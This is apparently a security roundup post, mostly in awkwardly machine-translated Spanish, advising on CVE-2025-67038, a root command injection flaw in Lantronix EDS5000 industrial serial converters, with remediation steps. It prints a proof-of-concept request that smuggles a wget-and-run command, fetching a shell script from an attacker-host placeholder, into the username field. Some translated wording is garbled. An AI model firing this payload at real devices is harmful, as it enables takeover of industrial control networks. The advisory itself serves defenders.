CVE-2025-67038: Lantronix EDS5000 CVSS 9.8 Code Injection — CISA KEV, ICS/OT Alert, Federal Deadline Today

CISA emite alerta urgente sobre la inyección de código CVSS 9.8 crítica en convertidores de serie industriales Lantronix.

CVE-2025-67038: Lantronix EDS5000 CVSS 9.8 Code Injection — CISA KEV, ICS/OT Alert, Federal Deadline Today

Este post forma parte del Semana del 26 de junio de 2026.

Vulnerability Overview

CVE-2025-67038 es una crítica código de inyección vulnerabilidad (CWE-94) en la serie Lantronix EDS5000 — un convertidor serie-a-Ethernet ampliamente desplegado en entornos de automatización industrial, tecnología operativa (OT) y ICS. CVSS puntuación: 9.8 Crítico. CISA la agregó al catálogo de vulnerabilidades explotadas (KEV) 23 de junio de 2026, con un plazo de remediación de la agencia federal 26 de junio de 2026 (hoy).

CVE: CVE-2025-67038 CVSS: 9.8 Resistente crítica CISA KEV: 23 de junio de 2026 FCEB Deadline: 26 de junio de 2026

Detalles técnicos

El Lantronix EDS5000 es un servidor de dispositivo serie que permite a los equipos industriales conectados en serie (PLCs, sensores, metros, robots) acceder y gestionar a distancia sobre Ethernet. La vulnerabilidad existe en el dispositivo Módulo HTTP RPC: cuando se trata de autenticación, el módulo toma el username parámetro y lo concatena directamente en un comando de shell para registrar eventos de autenticación fallidos — sin ninguna sanitización. Un atacante puede inyectar metacaracters OS en el campo de nombres de usuario para ejecutar comandos de raíz arbitrarios, sin necesidad de credenciales válidas.

Proof-of-Concept Attack

POST /auth HTTP/1.1
Host: <target-ip>
Content-Type: application/x-www-form-urlencoded

username=admin%3Bwget+http%3A%2F%2F<attacker-ip>%2Fshell.sh+-O+%2Ftmp%2Fs%3Bash+%2Ftmp%2Fs%26&password=x

El comando shell injected via the username El parámetro funciona como root, habilitación: descarga y ejecución de las cargas de pago, estableciendo conchas inversas, modificando la configuración del dispositivo para retransmitir el tráfico de atacantes, pivotando a las redes OT/ICS de aire comprimido alcanzables sólo a través de los dispositivos conectados con serie.

OT/ICS Impact

El papel de EDS5000 como puente serie-a-Ethernet hace que esta vulnerabilidad sea particularmente peligrosa en entornos OT. Compromisar un EDS5000 puede dar a los atacantes:

  • Mando y control directo sobre PLCs conectados en serie, RTUs y controladores industriales
  • Capacidad para manipular lecturas de sensores alimentadas a sistemas SCADA
  • Un punto clave en las redes de control con aire
  • Potencial para la perturbación del proceso físico en la fabricación, utilidades e infraestructura crítica

CISA señaló específicamente el potencial de "pérdida o negación de control sobre activos industriales o de automatización" mediante la manipulación de dispositivos vulnerables.

Versiones y arreglos afectados

All Lantronix EDS5000 Dispositivos de serie antes de la versión de firmware 2.2.0.0R1. Lantronix lanzó la solución y recomienda actualización inmediata a EDS5000 versión 2.2.0.0R1. Contacto Soporte Lantronix si los mecanismos de actualización automática no están disponibles en su entorno OT.

Remediación

  • Aplicar parche inmediatamente: Actualizar a Lantronix EDS5000 versión de firmware 2.2.0.0R1.
  • Serie de sesiones de red: Asegurar que las interfaces de gestión EDS5000 no estén expuestas a redes no confiadas. Colocarlos detrás de un firewall o servidor de salto que restringe el acceso a rangos IP confiables solamente.
  • Interfaz de gestión HTTP si no es necesario — use SSH o acceso a consola física en su lugar.
  • Exposición de inventario: Búsqueda Shodan para product:"Lantronix EDS5000" para identificar instancias expuestas en Internet en su organización.
  • Si el parche no es inmediatamente posible en su entorno OT, aislar el dispositivo desde el acceso a la red externa como mitigación de emergencia.
  • Monitor for IOCs: Inesperadas conexiones externas, cambios de configuración o entradas de registro de autenticación inusuales en dispositivos EDS5000.

← Volver a la Ronda de Seguridad: Semana del 26 de junio de 2026